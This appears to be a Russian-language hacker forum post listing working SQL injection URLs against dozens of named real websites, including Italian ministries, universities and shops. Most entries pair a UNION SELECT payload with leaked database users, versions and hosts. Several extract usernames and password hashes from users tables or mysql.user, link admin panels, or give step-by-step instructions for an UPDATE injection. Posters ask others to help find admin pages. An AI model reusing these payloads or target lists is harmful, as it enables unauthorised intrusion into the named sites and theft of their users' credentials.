Не много от меня =))


http://zolrus.ru/articles.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,1,2,concat_ws( 0x3a,user(),version()),4,5--
http://zolrus.ru/admin/


PR:3 ТИЦ:300
http://www.dicom.spb.ru/tech/articles.php?id=-7+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5,6,7,8,9,0,1--
dicom_root@localhost:4.1.22-standard


http://fengshuiyar.ru/articles.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5--


http://www.nomadic.ru/articles.php?P=SA&ID=-7+union+select+concat_ws(0x3a,user(),version())--


http://infosfera.sfo.ru/a/articles.php?cat_id=20&id=7+union+select+1,2,3,4,concat_ws(0x3a,username, user_password),6,7,8,9+from+phpbb_users--
http://infosfera.sfo.ru/a/forum/


http://www.eagleye.ru/articles.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5--


http://www.petrotent.ru/articles.php?id=-7+union+select+1,concat_ws(0x3a,login,pass),3,4+fr om+users+limit+1,1--


http://www.nk-life.ru/articles.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5--


http://sap-design.ru/cms-articles.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8--


http://www.dubovieizdeli.ru/articles.php?id=-7+union+select+concat_ws(0x3a,user(),version()),2--
http://www.dubovieizdeli.ru/admin/ - пароль всеравно не нужен ;)


http://inforient.ru/articles/articles.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5--


http://billiard4u.ru/article/article.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6--


http://www.ramld.ru/articles/article.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7--


http://vniispk.ru/news/konferenciya_2008/article.php?id=-7+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion()),7,8--


http://www.laundrypro.ru/article.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6--


http://isakanov.ru/article.php?id=-7+union+select+concat_ws(0x3a,user(),version()),2, 3,4,5,6--


http://www.laptev-strongman.ru/article/article.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8,9,10--


http://encycl.anthropology.ru/article.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8,9,0--
PR:6


http://www.muscul.ru/article.php?id=-7+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5--


контора по созданию бажных сайтов xD
http://www.it-brains.ru/article.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4--


http://www.artcredo.ru/article.php?id=-9+union+select+1,concat_ws(0x3a,user(),version()), 3,4--


Магазин мобилок
http://www.mclub.ru/article.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3--


http://photo-sochi.ru/article.php?id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4--


http://www.pogoda812.ru/article.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3--


http://newcharmed.ru/article.php?id=-7+union+select+1,concat_ws(0x3a,username,password) +from+users--
з.ы. хешики смотрим в самом низу ;)


http://www.bsv999.ru/article.php?id=-7+union+select+1,2,concat_ws(0x3a,user,pass)+from+ users--
сайт супер-мего-кодера xD


http://www.msynt.ru/article.php?id=-7+union+select+concat_ws(0x3a,username,user_passwo rd)+from+forum_users+limit+1,1--
http://www.msynt.ru/forum/ - phpbb3


http://www.microcod-a.ru/article.php?id=-7+union+select+concat_ws(0x3a,user(),version()),2--


http://www.molodoi-gazeta.ru/article.php?table=left_news&id=-7+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6--

http://visagefilms.com/dvddetails.php?seqID=41999+union+select+1,2,3,4,5, 6,version(),8,9,10--+

Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: visagefilms
User name: wwwuser@localhost

http://www.concerts4u.at/cd_berichte.php?id=-6+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
5.0.32-Debian_7etch10-log:concerts4u_at:concerts4u@localhost

http://www.homeidei.ru/index.php?link=9&id=-999+union+select+concat_ws(0x3a,version(),database (),user()),2,3--
5.0.81-community:b783_homeidei:b783_homeidea@localhost

http://czn.nnov.ru/?doc=6&id=-6+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8--
5.0.51a:cznnnovru:cznnnovru@localhost

http://beauty_land.nskfitness.ru/print.php?id=-999+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11--
5.0.67:sibdetiru_nskfit:sibdetiru@78.108.81.131

http://www.good-result.com/market/firma.php?id=1'+and+substring(version(),1,1)=5/*

####################################
давно unhex(hex()) не видел =)

http://www.leto-shop.ru/good.php?id=-1+union+select+1,unhex(hex(concat_Ws(0x3a,user(),d atabase(),version()))),3,4,5,6,7,8,9,10,11,12,13--

leto_shop_ru@localhost:leto_shop_ru:4.1.14

ТИЦ: 450
PR: 5

http://ktv.ru/tv_channels.php?id=1'+and+substring(version(),1,1) =5+--+

####################################
PR 4

http://www.vasarok.lt/index.php?id=1+and+substring(version(),1,1)=4

http://www.indiegamemusic.com/viewtrack.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version()),8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35/*sirlou_root@ws8.surf-town.net:sirlou_indiegamemusic:4.1.21-log

PR: 5

http://www.gxt.it/footer_pagina.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--

gxt@62.149.199.108:gxt:5.1.24-rc-log

http://www.videoneurosurgery.com/video.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database%20(),user()),7,8,9,10,11,12,13--
4.1.23-pro-gpl-log:videoneurosurgery_com_regolo:LB5706_regolo@81. 88.49.16

http://b10r.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),%20dat abase(),user()),4,5--
5.0.32-Debian_7etch10-log:b10r_com:b10r_com@srv43.one.com

http://chudo.tomsk.ru/?page=deti&id=-256+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+--+

Извините уж :(

http://www.luxuryyachts.ru/catalogue.shtml?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat_ws(0x3a,cast(version()+as+binary ),cast(database()+as+binary),cast(user()+as+binary ))--
4.1.14-standard:aitsru:technos@localhost

http://www.x-club64.ru/catalog/objects/?id=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6--
5.0.45-log:studa1007_mdom:studa1007_mdom@217.112.35.23

http://www.iluba.ru/info.php?ID=-9999+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3--
5.0.67:ilubaru:ilubaru@78.108.81.191

http://ww.talas-m.ru/info.php?id=-1+union+select+1,2,concat_Ws(0x3a,user(),database( ),version()),4+--&t=resort

talasm@yox.hc.ru:wwwtalasmru:4.0.26

[PR 4]
http://www.fullsecurity.be/en/article.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9,10,11,12--5.0.45-community:fullsecu:fullsecu@localhost
======================================
[PR 4]
http://www.davincijobs.com/news/display_article.php?id=-12+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,version(),database(),user())))5.0.16:davincinew:d avinci1452@localhost
http://www.davincijobs.com/news/display_article.php?id=-12+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,user,password,file_priv)))+from+mysql.user
======================================
[PR 3]
http://www.kkl.be/article.php?id=-10+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),45.0.68-log:kklbebase1:kklbebase1@10.0.65.175
======================================
[PR 3]
http://www.aspnettoyage.be/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14--5.0.45-community:aspnetto:aspnetto@localhost
======================================
[PR 2]
http://www.liebe-zu-ihm.be/article.php?id=-388+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,194.1.22-standard:liebezu_Christo:liebezu_guest@localhost
======================================
[PR 1]
http://tanleminh-craft.com/ListProducts.php?ID=-9+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12,13,14,15--4.1.22-standard:tanlemin_:tanlemin_@localhost
======================================
[PR 1]
http://be-ecotherm.com/article.php?id=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,95.0.45-Debian_1ubuntu3.3:beecotherm_db:root@localhost

http://mediafm.tomsk.ru/?page=news&show=-164+union+select+1,2,3,4,5,6,7+--+
5.0.45.
mediafm@localhost
mediafm

[PR 3]

http://www.pihtipudas.net/kuntositi/sivu.php?ID=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,11,12,13,14,15,16, 17,18,19,20,21,22--

user() lue_pihtipudas@10.1.0.9
database() pihtipudas
version() 4.1.22-standard-log :mad:

http://salgirka.com/flower.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6bospor_user1@localhost:bospor_sa lgirka:5.0.32-Debian_7etch8-log

http://tolkovatel.com/flower.php?id=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),d atabase(),version()))),3sergkap_sms@77.221.130.1:s ergkap_sms:4.1.11-Debian_4sarge2-log

http://www.utstat.toronto.edu/pagecontent/index.php?pageid=10+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12/*
version() 5.0.41
user: uoftstats55@localhost

посимвольно(

http://oklahomawildflowers.110mb.com/flower.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9oklahomawildflowers_flwrs@ localhost:oklahomawildflowers_flwrs:5.0.27-Debian_0.dotdeb.1

http://www.arnottower.co.uk/fib/flower.php?ID=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17to wer@server3280.cobaltnetworks.co.uk:arnottower:4.1 .20

PR: 4

http://ww.skscr.cz/ds.php?page=skupinfo&id=1+and+substring(version(),1,1)=4--
####################################
http://ww.pmta.org/marketplace/cart/displayPhotoDetail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,user(),database(),version()),12,13,14-- вывод в пути картинки pmtaorg_dbuser@209.173.130.11:pmtaorg_db:5.0.67-log
####################################
http://hamycashew.com/index.php?mod=product&view=detail&code=WW-210&id=1&cid=-2+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6

hamycashew@localhost:hamycashew:5.0.27-community-nt

http://www.huntik-tcg.de/forum/news.php?id=-9+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10--

d00a8054:4.1.22-max-log:d00a8054@localhost

http://www.sigmatur.ru/hotels/info/hotels.php?fid=1484332+union+select+1,2,3,4,unhex( hex(concat_ws(0x3a,version(),database(),user()))), 6+limit+1,1/*
version():5.0.26-lk-log
database():sigmaru_frs2
user():sigmaru_frs2@localhost

http://www.activerider.co.uk/video_details.php?id=52+UNION+SELECT+1,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Ver sion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7 873716C696E6A656E64),0x71),0x71),3,4,5,6+LIMIT+1,1--
Database Version: 5.1.26-rc-5.1.26rc
Database name: db58490_activerider
User name: db58490@72.47.228.21

http://www.pennhk.com/membership/announcement_details_view.php?id=52+UNION+SELECT+1 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A62 6567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2 F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5 ,6,7,8,9,10,11+LIMIT+1,1--
Database Version: 4.1.14-standard
Database name: pennhk_com_-_database
User name: pennhk@localhost

http://www.temask.ru/product.php?id=-7+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8,9,0,1,2,3,4,5--


http://www.itsprim.ru/product.php?id=-7+union+select+1,2,3,concat_ws(0x3a,login_usr,pass _usr),5,6,7,8+from+users_usr--
http://www.itsprim.ru/admin/

http://www.martahewett.com/detail.php?cid=yamano09&artist_id=yamano&no_a=1&artwork_id=-90609+union+select+1,2,3,version(),5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1--
Галерея сумасшедшей дизайнерши.
5 ветка.
Через базу тянется еще много баз :)

ням
http://eup.wmich.edu/calendar/newsDisplay.php?newsId=-129'+union+select+1,email,password,4+from+people/*
пассы в кодировке хз какой))
Version: 4.1.20-log
User: eup_cms_admin@kaoru.it.wmich.edu
Db: eup_cms

http://www.trinitystores.co.uk/news/readnews.php?id=-13+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9,10,11--

trinity:4.1.20:admin@localhost



http://www.element22.com/site/post.php?id=-24+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

cms:5.0.67-log:e22@cheeky.dreamhost.com



http://www.ninjadogdesign.com/post.php?id=-30+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7--

vinczegr_:5.0.67-community:vinczegr_vincze@localhost




http://www.epayonsite.com/post.php?id=-2285+union+select+1,2,concat_ws(0x3a,database(),ve rsion(),user()),4,5,6,7,8,9,10,11,12,13,14--

epayonsite:5.0.51a-24+lenny1-log:patanin@localhost



http://happysoulindustry.com/HowAreYou/post.php?id=123+union+select+1,2,3,4,concat_ws(0x3 a,database(),version(),user()),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32--

howareyou:5.0.45-log:howareyou@boscgi1001.eigbox.net

http://kenpom.com/conf.php?c=-WCC%27+union+select+1,2,concat(char(58,58,58),conc at_ws(char(58),member_id,username,password,email), char(58,58,58))+from+pmh3457a.exp_members/*

http://www.komnasfbpi.go.id/archive_eng.php?bln=5&thn=-1+union+select+1,2,3,4,concat(char(58,58,58),conca t_ws(char(46),table_schema,table_name),char(58,58, 58)),6,7,8,9,10,11,12,13,14+from+information_schem a.tables--

http://www.amcham.co.cr/member_file.php?MID=-1'+union+select+1,concat(char(58,58,58),table_sche ma,char(46),table_name,char(58,58,58)),3,4,5,6,7,8 ,9,10,11+from+information_schema.tables/*

http://www.jamieoliver.com/foodwise/search.php?search=&category=-9+union+select+1,2,3,concat(char(58,58,58),concat_ ws(char(58),user_login,user_pass,user_email),char( 58,58,58)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+evo_users/*
===========

PR: 4

http://www.westbud.pl/en/index2.php?w=zp&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat_Ws(0x3a,user(),database(),version()) ,19,20,21,22,23,24--&ww=l

westbud01@192.168.2.117:westbud01:5.0.32-Debian_7etch10-log

http://museum.city.kawagoe.saitama.jp/db/capt.php4?ID=-7+union+select+1,db_name(),3,4,5,@@version,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48--


Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

PR:5

http://www.sns-uk.co.uk/news/news-full.php?newsid=-12625+union+select+1,2,concat_ws(0x3a,database(),v ersion(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20--

eurohs:5.0.45:eurohs@server213-171-218-205.livedns.org.uk



PR:5

http://www.ifrtd.org/new/news/full.php?view=-111+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18--

ifrtd:5.0.51a-24+lenny1-log:ifrtd@localhost



PR:4

http://www.penguinworld.com/news/full.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5--

adelie_data:5.0.81-community:adelie_adelie@localhost



PR:4

http://c2-europe.eu/news-full.php?id=-125+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),version(),user()),8,9,10,11,12,13,14--

c2deuts_ice:5.0.81-community-log:c2deuts@ns1.aaahosting70.de
несмог админку :( наити помогите плз




http://www.chrecruitment.co.uk/news.full.php?id=83+union+select+1,concat_ws(0x3a, database(),version(),user()),3,4,5--

chrecrui_rec:4.1.22-standard:chrecrui_admin@localhost

кусь
http://www.cds.edu/php/leftLinkContents.php?categoryId=-311+union+select+chrPassword,2,3,4,5,6,7,8+from+ad min/*&masterID=76&intLevel=1&mainID=76

снова ****ые символы национальные(((

админка лежит где обычно.

пр5
Шоп банчит борохлом и жутко ругаеться, но на вопросы всёже отвечает ))
http://shop.usskiteam.com/store/product.php?productid=16640)+UNION+SELECT+concat_w s(0x3a,user(),version()),2+--+
usski_xcart@localhost:4.1.22-standard

http://www.addictions.ru/info0.php?dir=1+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4--&pid=15


hmd_helpmedoc@localhost:hmd_helpmedoc:5.0.51a-community

####################################
http://www.slk-digital.ru/gadgets/?t_id=-30+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9--

slkdigital_root@localhost:5.0.51a-community:slkdigital_digital

http://pathbinderh.plantgenomics.iastate.edu/pblevel2.php?term1=-56321+union+select+convert(version()+using+latin1) ,2/*
Version: 4.1.12-standard-log
User: pbuser@schnable-hercules.agron.iastate.edu

http://books.nt.am/media_info.php?ID=42+and+1=0+union+select+concat(u ser,char(58),password),2,3+from+mysql.user/*

PR:4 ТИЦ:40
http://www.meteo-nso.ru/news.php?id=-96+union+select+1,concat_ws(0x3a,name,psw),3,4,5,6 ,7+from+meteo_users--

Один из престижных универов г.Уфа :D

http://www.mf.rusoil.net/index.php?module=content&id=35+union+select+1,concat_ws(0x3a,user(),databas e(),version())--

mf@localhost:mf:4.1.16-nt

Знаменитый surfjunkey

http://www.surfjunky.com/gethelp.php?q=-10'+union+select+1,2,unhex(hex(concat_ws(0x3a,user (),version(),database()))),4,5,6/*

surfjunky@68.178.158.204:4.1.10-standard-log:surfjunky_com_-_surfjunky

Мурманская областная научная библиотека

http://www.mgounb.ru/?folder=1&menu=43&content=-414+union+select+concat_ws(0x3a,user,password)+fro m+mysql.user--

PR: 7 ТИЦ: 400

Инъекция в операторе UPDATE, POST-запросом:

http://wblist.ru/partner/
Регистрируемся тут с любыми даными.

http://wblist.ru/partner/p-editacc.php
Заходим сюда и пишем по очереди в любое поле:
toor',ICQ_partner=user()/*
toor',ICQ_partner=database()/*
toor',ICQ_partner=version()/*

Смотрим в поле ICQ по очереди:
tests@localhost
tests
5.0.26

http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2C3%2C4%2C5%2C6%2 C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17 %2C18%2C19%2C20%2C21%2C22%2F*

нашел кол-во полей - 24. 3 поле активное. aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22/* запрос в поиске сайта


-------------------------------
список всех таблиц ---> http://kulinarnayakniga.ru/search/?action=index&text=aa%27%29+union+select+1%2C2%2CTABLE_NAME%2C4% 2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15% 2C16%2C17%2C18%2C19%2C20%2C21%2C22+FROM+INFORMATIO N_SCHEMA.TABLES%2F*

http://www.dop.ru/news.php?id=-96+union+select+1,2,concat_ws(0x3a,user(),version( )),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
http://www.dop.ru/admin/


http://www.pushcar.ru/dilers/news/news.php?id=-96+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version()),0,1,2--

http://www.sns-uk.co.uk/news/news-full.php?newsid=-12625+union+select+1,2,concat_ws(0x3a,database(),v ersion(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20--

eurohs:5.0.45:eurohs@server213-171-218-205.livedns.org.uk



http://www.thewebaholic.com/news/readnews.php?id=105+union+select+1,2,3,4,concat_ws (0x3a,database(),version(),user()),6,7--

thewebaholic:5.1.30-community:thewebaholic@127.0.0.1



http://www.koreasarang.com/readnews.php?id=-767+union+select+1,2,3,4,concat_ws(0x3a,database() ,version(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--

ks_db:5.0.51a-24+lenny1-log:koreasarang@localhost



http://www.kickbacksystems.com/readNews.php?id=-22+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7--

kickback_sales:5.0.81-community-log:kickback_kickbac@localhost

PR 4
http://www.cath.com/index.php?cmd=1&id=-1039+union+select+1,2,3,version(),5,6,7,8,9,0,11,1 2,13,14,15/*

Database Version: 5.0.37-log
Database name: catholic
User name: catholic@localhost

http://perfectbonus.com/

http://perfectbonus.com/directory/viewListing.php?listID=[sql]

http://perfectbonus.com/directory/viewListing.php?listID=-4+union+select+1,2,3,4,5,6,%207,8,9,10,11,12,13,14 ,15,16,17,18,19,group_concat(userName,0x3a,passwor d),21,%2022,23,24,25,26,27,28+from+users--
Users\Passwords(Hash)

http://perfectbonus.com/directory/admin/ Admin Panel

DataBase: pokerDir
Version: 5.0.37
User: dirUser@localhost

http://sonix.dk/index.php?page=forum&id=-2'+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8+--+

sonix@localhost:sonix:5.1.33-log

PR4

http://www.mkvplayers.com/ru/Forum/?func=%27%20union%20select%201,2,3,concat_ws(0x3a, jos_users.username,jos_users.password),5,6%20FROM% 20jos_users%20WHERE%20jos_users.id=62--%20a

http://www.mkvplayers.com/administrator/

http://metrotimes.com/editorial/story.asp?id=1 or 1=@@version

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2

PR: 6

http://www.cittadellarte.it/readnews.php?id=-382+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,concat_ws(0x3a,database(),versio n(),user()),22--

cittadellarte:4.1.10a:cittadella@arwen.mymcomm.int ra

http://www.allneon.ru/news.php?id=35%20union%20select%201,2,database(),4 ,5,6,7,8,9/*
Database Version: 5.0.45
Database name: satellite_allneon
User name: us4514a@localhost

PR3
http://www.vsmap.ru/pages.php?ID=%27+union+select+1,concat_ws(0x3a,ver sion(),user(),database())--+
Database version:5.0.45-community-nt-log
Datanase name:1gb_maindb
User name:1gb_maindb@10.0.2.2

http://www.riskcenter.com/story.php?id=11459+union+select+1,2,3,4,5,6,7,conc at_ws%280x3a,version%28%29,database%28%29,user%28% 29%29,9,10,11,12,13,14,15,16,17+limit+1,1/*
version():4.0.22-log
database():riskcenter
user():root@localhost

Есть табличка mysql.user

http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),version() ),4--


http://cargocrane.ru/news.php?id=-4+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8--


http://www.rccp.ru/news.php?id=-4+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6,7,8--


http://www.rosbo.ru/nsk/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),version() ),4,5,6,7,8,9,0,1--

Дизайн-студия «X-Project» работает с 1995 года))

http://xproject.ru/company/news/news_info4399+union+select+1,2,3,4,5,6,concat_ws(0 x3a,database(),user(),version()),8,9/
xproject_www:xproject_www@mx2.xproject.ru:4.1.20-log

http://eas.punkt.at/index.php?content=1374+union+select+1,concat_ws%28 0x3a,version%28%29,database%28%29,USER%28%29%29,3+ limit+1,1/*
version():4.0.24_Debian-10sarge2-log
database():conx21_eas
user():conx21_eas@91.209.89.41

tables:
mysql.user
__
http://www.flyus.aero/index.php?nav=overons&id=4%27+union+select+concat_ws%280x3a,version%28%2 9,database%28%29,user%28%29,@@datadir,@@tmpdir,@@v ersion_compile_os%29,2+from+information_schema.col umns+limit+1,1/*
version():5.0.45-log:
database():denit_flyus
user():flyus@localhost
@@datadir:/var/lib/mysql/
@@tpmdir:/tmp/
@@version_compile_os:redhat-linux-gnu
__
http://www.cockpit.aero/index.php?page=fotos&gid=14+union+select+1,2,concat_ws%280x3a,version%2 8%29,database%28%29,user%28%29,@@datadir,@@tmpdir, @@version_compile_os%29,4,5/*
version():5.0.41-community-nt
database():zdmedien
user():zdmedien@localhost
@@datadir:C:\Programme\MySQL\MySQL Server 5.0\Data\
@@tmpdir:C:\WINDOWS\TEMP\
@@version_colmpile_os:Win32

http://www.orlandoweekly.com/film/story.asp?id=1 or 1=@@version

Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2

http://www.global-aero.co.uk/news.php?id=12+union+select+1,2,3,concat_ws%280x3a ,version%28%29,database%28%29,user%28%29,@@datadir ,@@tmpdir,@@version_compile_os%29,5,6,7,8,9,10,11, 12,13,14,15+limit+1,1
version():5.0.81-community-nt
database():globalaero_mysql
user():globalaero@81.27.108.140
@@datadir:E:\Program Files\MySQL\MySQL Server 5.0\Data\
@@tmpdir:C:\WINDOWS\TEMP\
@@version_compile_os:Win32

http://fest4u.qip-hosting.de/bildermittel.php?ordnerid=-1'+union+select+1,2,3,4,concat_Ws(0x3a,user(),data base(),version()),6,7/*

fest4u@localhost:fest4u:4.0.24-nt

http://www.aes-aero.com/read.php?id=62+union+select+1,2,concat_ws%280x3a,v ersion%28%29,database%28%29,user%28%29%29,4,5,6,7+ limit+1,1/*
version():4.1.22-log
database():aes_aero_com
user():db305395@http4.ewetel.de

PR 8

http://www.sviluppoeconomico.gov.it/Dipartimenti/index.php?sezione=Dipartimenti&tema_dir=tema2&id=1+union+select+1,2,concat_Ws(0x3a,user(),databa se(),version())+from+mysql.user--

root@localhost:ministero:5.0.51a-3ubuntu5.4-log

MQ = on :'(


PR 8
http://www.trasporti.gov.it/page/NuovoSito/site.php?id=1+and+substring(version(),1,1)=5--&o=vh&p=cm

http://www.cargolux.aero/Press/Brochures.php?nid=92+union+select+1,2,3,4,concat_w s%280x3a,version%28%29,database%28%29,user%28%29%2 9,6,7,8,9,10,11,12,13,14+limit+1,1/*
version():4.0.26-standard-log
database():WCM
user():webadm@ns3.cargolux.com

http://swedbank.ua/index.php?cat=8&news=2946+and+ascii(substring((user()),1,1))%3E=1/*

Select фильтрует,вот и забил.

с чайком пойдет))
http://bentley.umich.edu/research/guides/civilwar/civilwar_search.php?nameid=-63'
кол-во 12

Version: 5.0.45-log
User: bentley@dutch.web.itd.umich.edu
Db: bentley

http://o33.dk/statsnew/turnering.php?divid=9999+union+select+1,@@version, 3,4+/*+&year=2009

Mysql version: 5.0.32-Debian_7etch10-log
только как то странно он на () реагирует

kazan.ru
PR 5
тиц 1700

http://kazan.ru/horo/?zod=12+and+1=2+union+select+1,2,3,concat_ws(0x3a, database(),user(),version())/*&date=0
newkazan:kazan@localhost:5.0.45-log

pfibike.com

http://www.pfibike.com/dettagli2.php?id=5948'

http://www.pfibike.com/dettagli2.php?id=5948%27+union+select+1,2,3,4,5,co ncat_ws(char(58),user(),database(),version()),7,8, 9,10,11,12+--+

pfibike@localhost:pfibikedb:5.0.45-log

http://www.pfibike.com/dettagli2.php?id=5948%27+union+select+1,2,3,4,5,gr oup_concat(concat_ws(char(58),id,user,passw)),7,8, 9,10,11,12+from+admin+--+

админки так и не нашел, если кому повезет, прошу черкнуть в ПМ

laforestadiscoclub.it

http://www.laforestadiscoclub.it/photo.php?dl_vars[dl_state]=parati&dl_vars[id_tipotenda]=-1+union+select+1,2,3,concat_ws(char(58),user(),dat abase(),version()),5,6+--+

forest@localhost:forest:5.0.45-log

(вывод в адрес картинки)

elenparati.it

движок такой же как и в прошлом примере, так что запрос аналогичен...

http://www.elenparati.it/php/index.php?dl_vars[dl_state]=parati&dl_vars[id_tipotenda]=-1+union+select+1,2,3,concat_ws(char(58),user(),dat abase(),version()),5,6+--+

вывод туда же)

PR7
EDU
http://www.ithaca.edu/ithacaguide/index.php?action=cat&id=-1+union+select+concat_ws(0x3a,user_username,user_p assword)+FROM+dotproject.users+limit+1,1+--+
MySQL version:5.0.45
Database name:ic
Username:dbadmin@www.ithaca.edu
Замучался нахожу пасс не нахожу для него админки...=(
может кому больше повезет!

http://buy-dom.ru/pages.php?id=-11+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3--

kinoplu_buydomru:5.0.81-community:kinoplu_buydomr@localhost




http://www.kinobel.ru/raduga/announce.php?id=-423+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7,8,9,10,11,12--

kinobel_ru:5.0.72:kinobel@127.0.0.1



http://pro-kharkov.info/pages.php?id=-117&source=3+union+select+1,2,3,4,concat_ws(0x3a,datab ase(),version(),user()),6,7,8--

PROKHARKOV_MAIN:5.0.51A-COMMUNITY:PROKHARKOV_MAIN@LOCALHOST



